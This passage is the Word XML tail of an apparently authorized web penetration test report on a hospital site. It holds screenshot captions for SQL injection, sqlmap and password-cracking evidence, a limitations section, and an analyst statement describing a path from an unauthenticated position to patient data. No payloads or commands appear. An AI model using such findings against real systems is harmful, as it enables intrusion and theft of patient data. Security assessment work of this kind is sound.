        <w:t>21 PDF Crack Execution — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2873372"/>
            <wp:docPr id="41" name="Picture 41"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="22_SQLi_Application_Evidence.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2873372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>22 SQLi Application Evidence — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="5093902"/>
            <wp:docPr id="42" name="Picture 42"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="23_SQLmap_Validation.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="5093902"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>23 SQLmap Validation — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2887443"/>
            <wp:docPr id="43" name="Picture 43"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="24_Staff_Directory_Index.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2887443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>24 Staff Directory Index — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2898700"/>
            <wp:docPr id="44" name="Picture 44"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="25_Staff_Login.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2898700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>25 Staff Login — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>33. Limitations &amp; Evidence Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The exact server-side source code was not available; root causes are therefore stated at the level supported by black-box behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap did not independently confirm the SQL injection because of repeated HTTP 403 responses and connection instability. Manual differential testing and Burp/browser evidence are the primary proof.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A standalone cross-patient IDOR was not claimed because the test did not establish that a legitimately authenticated patient could access another patient record without the authentication bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The contents of the exposed error_log were not claimed as readable; only its filename and metadata were observed in the directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Auxiliary mail/FTP/DNS/cPanel services were enumerated but not independently exploited because the authorized scope was the target domain and no destructive or out-of-scope testing was performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>No crack runtimes are reported because reliable timing evidence was not captured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>34. Final Analyst Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The evidence supports a practical compromise path from an unauthenticated external position to sensitive patient and corporate information. The strongest findings are independently reproducible and do not depend on speculative source-code claims. The most important remediation objective is to restore trust boundaries at the application, file-system and deployment layers simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This report is intentionally structured as a standalone security engineering case study. It demonstrates reconnaissance, manual exploitation, evidence preservation, cryptographic analysis, sensitive-data quantification, remediation engineering, detection design and retest planning. Those elements make the project suitable for a professional portfolio when accompanied by a sanitized public version that excludes credentials and personal data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Prepared by Chandrashekar Bala</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>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CONFIDENTIAL — INDEPENDENT SECURITY ASSESSMENT — CHANDRASHEKAR BALA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4"/>
      </w:rPr>
      <w:t>MEDIROZA  |  INDEPENDENT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Web Application Security Assessment — Mediroza General Hospital</dc:title>
  <dc:subject>End-to-end authorized web application penetration testing and security assessment</dc:subject>
  <dc:creator>Chandrashekar Bala</dc:creator>
  <cp:keywords>penetration testing, web application security, SQL injection, authentication bypass, evidence engineering, remediation</cp:keywords>
  <dc:description>Confidential professional security assessment.</dc:description>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>